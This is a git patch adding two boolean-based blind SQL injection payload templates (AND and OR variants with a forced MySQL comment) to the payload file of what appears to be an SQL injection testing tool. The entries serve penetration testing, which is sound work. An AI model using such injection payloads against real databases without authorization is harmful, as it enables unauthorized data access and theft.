From e6143beeaeefb18692abce1834e74388f7a1d25b Mon Sep 17 00:00:00 2001
From: ark <quentrg@gmail.com>
Date: Mon, 23 Jan 2017 18:24:26 +0100
Subject: [PATCH] Added payload for forced comments on boolean-based blind
 injections for WHERE or HAVING clause

---
 xml/payloads/boolean_blind.xml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)

diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml
index 114097cf7..e4b1b96e9 100644
--- a/xml/payloads/boolean_blind.xml
+++ b/xml/payloads/boolean_blind.xml
@@ -171,6 +171,22 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,9</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE] #</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM] #</payload>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison>
+        </response>
+    </test>
+
     <test>
         <title>OR boolean-based blind - WHERE or HAVING clause</title>
         <stype>1</stype>
@@ -187,6 +203,22 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,9</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE] #</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM] #</payload>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1] #</comparison>
+        </response>
+    </test>
+
     <test>
         <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
         <stype>1</stype>